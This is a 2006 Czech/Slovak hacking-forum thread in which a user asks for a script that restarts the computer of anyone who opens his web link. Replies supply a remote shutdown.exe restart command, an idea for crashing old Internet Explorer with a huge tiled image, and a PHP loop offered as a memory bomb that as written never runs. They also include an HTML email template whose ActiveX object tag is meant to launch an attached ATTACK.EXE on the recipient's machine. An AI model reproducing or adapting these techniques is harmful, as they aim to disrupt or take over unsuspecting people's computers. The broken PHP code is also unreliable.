script ktery restertuje PC

HackForum

script ktery restertuje PC#
Hele nevite nekdo o scriptu kterej restartuje pc? bylo by dobry ho nekam umistit.... a nebo aspon nejakej kterej neco vypne treba obraz atd.... piste *diky*
(odpovědět)
big dejf24.3.2006 18:37
re: script ktery restertuje PC#
mno neviem co mislis? skript do nejakeho jazika? alebo konzolovy skript pre nejaky os? ak ano aky os?
nabuduce uved udaje presnejsie....

mno dam priklad na konzolovy skript na reset winxp...
mno shutdown.exe -r -t 00 -m \\comp
pri com shutdown.exe je nazou programu(nemusis zadat umiestnjenie, nachadza sa v %windir%/system32 a tam si ho win najde z hocijakeho umiestnenia)
-r znamena reset, mozes pouzit napriklad aj -s co znamena vypnutie alebo -l co znamena log off.
-t 00 znamena cas za ktory sa to vypne 00 znamena cas v sekundach ak neudas ziaden cas tak je automaticky 30s
-m \\comp znamena nazou kompu v sieti ktory chces vypnut(musi to vyt povolene) ak neuvedies nic vypne sa tvoj
(odpovědět)
Juri Ivanovic Gorki | E-mail | ICQ 20719343524.3.2006 20:25
re: script ktery restertuje PC#
tam jak se zadava nazev compu, (myslis ip adresu?)
(odpovědět)
big dejf25.3.2006 6:46
re: script ktery restertuje PC#
mno mislel som nazou compu ked chces zadat IP tak bez lomitok takto shutdown.exe -m 1.2.3.4
(odpovědět)
Juri Ivanovic Gorki | E-mail | ICQ 20719343525.3.2006 7:20
re: script ktery restertuje PC#
tak napriklad ked das do stranky nejaky obrazok s exxtremne velkym rozlisenim v nejakom formate(nevem prestne aky,treba poskusat) tak to zhodi win...ale len cez IE 6 a starsie.......

takze napr obraok 16000x80000 vo formate napg .bmp a malo by to ist....
(odpovědět)
chrobakos | E-mail | Website | ICQ 19116595925.3.2006 1:18
re: script ktery restertuje PC#
mno on sa pital na skript... ale stejne si mislim ze sa vyjadril neuplne a zle... lebo sa na to neda odpovedat... inak to z tym obrazkom vazne funguje? inak mam na teba dotas.... viem ze je nejaky javascript ktory umoznuje vkladanie textu doo schranky... nmevies aky je to javaskript?
(odpovědět)
Juri Ivanovic Gorki | E-mail | ICQ 20719343525.3.2006 1:21
re: script ktery restartuje PC#
jojo ja myslym script ktery vyhodi, teda vlastne restartuje windows, kdyz ho umistim na nakej web... nekdo klikne na odkaz , tam bude ten script a pc se mu resetne!
(odpovědět)
big dejf25.3.2006 6:42
re: script ktery restartuje PC#
windows xp
(odpovědět)
big dejf25.3.2006 6:42
re: script ktery restartuje PC#
mno to co som napisal bol konzolovy skript pre winxp resp to bolo volani jedneho programu co je vo winxp... ale aj ked si povedal aky mas os si nepovedal v com chces ten skript... v nejakom konkretnom jaziku? alebo konnzola tak ako som napisal?
(odpovědět)
Juri Ivanovic Gorki | E-mail | ICQ 20719343525.3.2006 7:24
re: script ktery restertuje PC#
No on chtel neco na webu, takze knozolovy script asi ne. Myslim ze ten priklad s obrazkem co byl hore by se mu mozna hodil. Obet ale musi mit prohlizec kterej proti tomu neni zabezpecenej. (ve vetsine pripadu Internet Explorer starsich verzi)

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t25.3.2006 10:27
re: script ktery restertuje PC#
mno ale zober si ze by na web musel umiestnit nejaky brutal big obrazok... to je nerealne lebo by musel zdovodnit jeho vyznam aby si ho ludia sosly... a dalej napriklad wz.cz vam ani nenacita velke obrazky... ja si skor mislim ze by sa tu hodilo pouzit ten javascript co vola VBs ono je to v ppodstate jjednoduch ale funguje to len na MSIE
(odpovědět)
Juri Ivanovic Gorki | E-mail | ICQ 20719343525.3.2006 12:35
re: script ktery restertuje PC#
Ono pokud vim neslo o velkej obrazek. Stacil malickej treba 5x5 pixelu, ale poskladanej strasne mockrat vedle sebe, tak aby tvoril 16000x80000, nekde tu byl k tomu i odkaz se zdrojakem, uz si to nepametam.

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t25.3.2006 17:19
re: script ktery restertuje PC#
Ivanocic gorki, nebo někdo kdo zná ty skripty. Nylo by dobre sepsat to a přidat do user texts. At se ti he vsechno pohromade rozepsane... Thx jestli si nekdo najde cas.
(odpovědět)
InSAN3×N3T | E-mail | ICQ 30465121025.3.2006 18:28
re: script ktery restertuje PC#
presny ... protoze v dnesni dobe ma uz vetsin lidi zebespeceny prohlizece! mala preavdepodobnost ..
(odpovědět)
big dejf25.3.2006 19:26
re: script ktery restertuje PC#
Juri Ivanovic Gorki -- nemam sajnu aky javascript myslys....definuj..
(odpovědět)
chrobakos | E-mail | Website | ICQ 19116595925.3.2006 22:30
re: script ktery restertuje PC#
Ak som dobe poxopil tak je JavaScript ktory vola program vo VBs _? ...

----------
Who is Tyler Durden ?
(odpovědět)
ChreNik | E-mail | ICQ 22523378326.3.2006 11:46
tohle zatíží paměť a je to bez obrázků#
Tak místo obrázku se dá napsat i skript i jednoduchý skript,který velice zatíží paměť prohlížeče.Zjistil jsem to nedávno omilem když jsem pracoval na své stránce.Je to dělané v PHP a já to udělal u formuláře když jsem vyráběl roletku pro výběr dne v měsíci čili 1-31.
Příklad:
<code>
<?php
for($i=1; $i<0; $i++) {
echo "<option> kuk </option>";
}
?>
</code>
(odpovědět)
Migosh27.3.2006 11:48
re: tohle zatíží paměť a je to bez obrázků#
Tag 'CODE' tam bejt nemá jen sem chtěl by se to tady hezky vypsalo.Jinak 'option' je součást formuláře takže by to možná mělo bejt někde mezi tagy 'form'.Navíc si nejsem jistej jestli to schodí prohlížeč či celej počítač a nebo vůbec nic.Bude záležet na OS a browseru.
(odpovědět)
Migosh27.3.2006 11:53
re: script ktery restertuje PC#
RE: <code>
<?php
for($i=1; $i<0; $i++) {
echo "<option> kuk </option>";
}
?>
</code> ......

dá se to poslat mailem ????
(odpovědět)
for : migoshi27.3.2006 14:07
re: script ktery restertuje PC#
migoshi nevíš jak vyrobit odkaz s tim :

<code>
<?php
for($i=1; $i<0; $i++) {
echo \\\"<option> kuk </option>\\\";
}
?>
</code>

já bych to chtěl dát do odkazu napiš mi když tak kód předem dík ...
(odpovědět)
raftak27.3.2006 14:09
re: script ktery restertuje PC#
Dávat to da mailu jsem nezkoušel.Určitě lze napsat mail jako HTML ale nejsem si jistý zdali se zpracují i PHP skripty.Každopádně určitě lze vložit skript na nějakou stránku a do mailu vložit odkaz.Jestli vás to tak zajímá tak až bude čas tak to otestuju na různejch prohlížečích.
(odpovědět)
Migosh29.3.2006 23:46
re: script ktery restertuje PC#
Dobre je este ak napriklad do prilohy emailu date nejaky ATTACK.EXE .. (napriklad na restar PC) a potom poslete mail s obsahm
<html>
<head>
</head>
<body>
<object classid='CLSID:10000000-0000-0000-0000-0000
00000000' codebase='C:\cesta_k_tempotaryfiles\ATTACK.
EXE'></object>
</body>
</html>

//no a proste ide o to ze ten program ATTACK.EXE sa musi nahrat do tempotary files ..{co nie vzdy sa podary} a ulohou tohto ActiveX skriptu je spustit ho zo zadaneho umiestnenia ... v odbornyx kruhox sa tomu hovory FORCE FEEDING ...

source="hacking bez tajemstvi"
edited="chreNik" :)

----------
Who is Tyler Durden ?
(odpovědět)
ChreNik | E-mail | ICQ 22523378327.3.2006 15:47
re: script ktery restertuje PC#
Hmm tak jedine udelat php webovou stranku ... psanou v php.. co ?
(odpovědět)
bigdejf | Website | ICQ 25136518130.3.2006 15:44
re: script ktery restertuje PC#
toto neni v php a da sa to poslat aj mailom ... zalezi na tebe a kreativite sa medze nekladu ...

----------
Who is Tyler Durden ?
(odpovědět)
ChreNik | E-mail | ICQ 22523378330.3.2006 16:09
re: script ktery restertuje PC#
takze ten kod v php by podla fsetkeho ist nemal pretoze kazde php je defaulte nastavene ze ak sa nejaky script vykonava dlhsie ako 30sekunp tak ho vypne...a tento script zamestna prehliadac maxximalne na 30seconds ale nerrestartuje system...
(odpovědět)
chrobakos | E-mail | Website | ICQ 1911659591.4.2006 0:06

Zpět
 
 
 

 
BBCode